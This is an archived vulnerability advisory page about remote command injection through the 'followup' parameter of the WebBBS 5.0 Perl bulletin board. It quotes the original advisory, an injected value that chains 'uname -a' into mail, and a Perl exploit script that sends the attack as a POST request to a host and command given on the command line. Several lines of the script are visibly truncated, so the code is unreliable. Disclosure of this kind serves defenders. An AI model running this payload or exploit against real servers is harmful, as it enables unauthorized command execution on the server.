Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   WebBBS Vendors:   Burgdorf, Darryl
WebBBS Bulletin Board Input Validation Flaw in '' Allows Remote Users to Execute Arbitrary System Commands
SecurityTracker Alert ID:  1004568
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 18 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.0
Description:   An input validation vulnerability was reported in the WebBBS bulletin board software. A remote user can execute arbitrary commands on the system with the privileges of the web server.

Nerf gr0up reported that the vulnerability exists in the '' script where no input filtering is performed on the '$followup' variable.

A remote user can submit a URL that modifies the contents of the $followup variable to include system commands.

A demonstration exploit value is provided:

followup=10;uname -a|mail|

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can execute system commands on the server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.

 Source Message Contents

Subject:  WebBBS 5.0 (andlater versions) vulnerable: allow commands

             	--== Nerf gr0up: adv #7 ==--  
 		     WebBBS remote command execution

WebBBS by Darryl Burgdorf 
All versions are vulnerable.
WebBBS is a Web-based bulletin board. WebBBS stores 
messages as simple text files.

WebBBS script allows command execution on server.
This script does no filtering and due to this
remote command execution is possible.

The vulnerable code is shown below:

if ($FORM{'followup'}) { $followup = 
"$FORM{'followup'}"; }
if ($followup) {
		$subdir = "bbs".int($followup/1000);

Just change the value of $followup variable, e.g 
"followup=10" to 
"followup=10;uname -a|mail|" to exploit 
this vulnerability.


Attach (exploit in perl):

#  nerF gr0up
#  exploit code for
#  WebBBS by Darryl C. Burgdorf
#  all version up to 5.00 are vulnerable
#  this is an exploitation of "followup" bug.
#  it allows remote attacker to execute shell 
#  you can find WebBBS script at
#  06.06.2002
#  btr // nerf

use IO::Socket;

        $script = "/cgi-bin/webbbs/";
        $command = "uname -a|mail";
        $host = "localhost";
        $port = 80;

        $content = "$content" . "name=" . rand(254);
        $content = "$content" . "&email=" . rand(254);
        $content = "$content" . "&subject=" . 
        $content = "$content" . "&body=" . rand(254);

        $content_length = length($content);
        $content_type = 

        if (@ARGV[0]) {$command=@ARGV[0];}
        if (@ARGV[1]) {$host=@ARGV[1];}
        if (@ARGV[2]) {$script=@ARGV[2];}

        $buf = "POST " . "$script" . "?post 
        $buf = "$buf" . "Content-Type: 
        $buf = "$buf" . 
"$content_length\r\n\r\n$content", 0;

	print "\tnerF gr0up\n";
	print "exploit: WebBBS (, version up 
to 5.00\n";

        print "sent:\n$buf\n";

if($socket = IO::Socket::INET->new("$host:$port")){

        print $socket "$buf";
        print "recieved:\n$buf\n";


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC